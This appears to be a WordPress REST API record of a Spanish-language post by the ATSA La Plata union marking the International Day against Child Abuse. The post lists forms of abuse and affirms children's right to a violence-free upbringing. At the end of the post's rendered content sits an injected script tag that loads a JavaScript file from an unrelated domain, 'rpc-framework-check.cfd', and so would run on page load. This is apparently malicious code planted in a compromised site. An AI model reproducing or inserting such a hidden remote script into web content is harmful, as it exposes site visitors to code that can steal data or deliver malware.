{"id":18376,"date":"2025-04-25T00:00:00","date_gmt":"2025-04-25T03:00:00","guid":{"rendered":"http:\/\/atsalaplata.org.ar\/web\/?p=18376"},"modified":"2026-02-02T17:13:41","modified_gmt":"2026-02-02T20:13:41","slug":"dia-internacional-de-la-lucha-contra-el-maltrato-infantil-2","status":"publish","type":"post","link":"http:\/\/atsalaplata.org.ar\/web\/2025\/04\/dia-internacional-de-la-lucha-contra-el-maltrato-infantil-2\/","title":{"rendered":"D\u00eda Internacional de la Lucha contra el Maltrato Infantil"},"content":{"rendered":"\n<p>\ud83e\uddf8El d\u00eda 25 de abril se conmemora el D\u00eda Internacional de la Lucha Contra el Maltrato Infantil, fecha instituida por Unicef para crear conciencia en la sociedad sobre la necesidad de erradicar todo tipo de violencia contra las infancias y adolescencias.<\/p>\n\n\n\n<p>El maltrato infantil se manifiesta bajo diversas formas como el maltrato f\u00edsico y psicol\u00f3gico, abuso sexual, desatenci\u00f3n o negligencia y explotaci\u00f3n comercial o de otro tipo.<\/p>\n\n\n\n<p>Es importante hacer hincapi\u00e9 en el derecho que tienen todos los ni\u00f1os\/as a transitar una crianza sin zamarreos, golpes, gritos, insultos, amenazas y\/o indiferencia.<\/p>\n\n\n\n<p>#SanidadATSALaPlata #SiempreJuntoAVos<\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>\ud83e\uddf8El d\u00eda 25 de abril se conmemora el D\u00eda Internacional de la Lucha Contra el&#8230;<\/p>\n","protected":false},"author":2,"featured_media":18377,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[146,98,147,97,85,148],"tags":[],"class_list":["post-18376","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-destacado","category-home","category-novedades","category-sec-de-cultura","category-sec-de-prensa","category-ultimas-noticias"],"_links":{"self":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18376","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/comments?post=18376"}],"version-history":[{"count":2,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18376\/revisions"}],"predecessor-version":[{"id":20831,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18376\/revisions\/20831"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media\/18377"}],"wp:attachment":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media?parent=18376"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/categories?post=18376"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/tags?post=18376"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}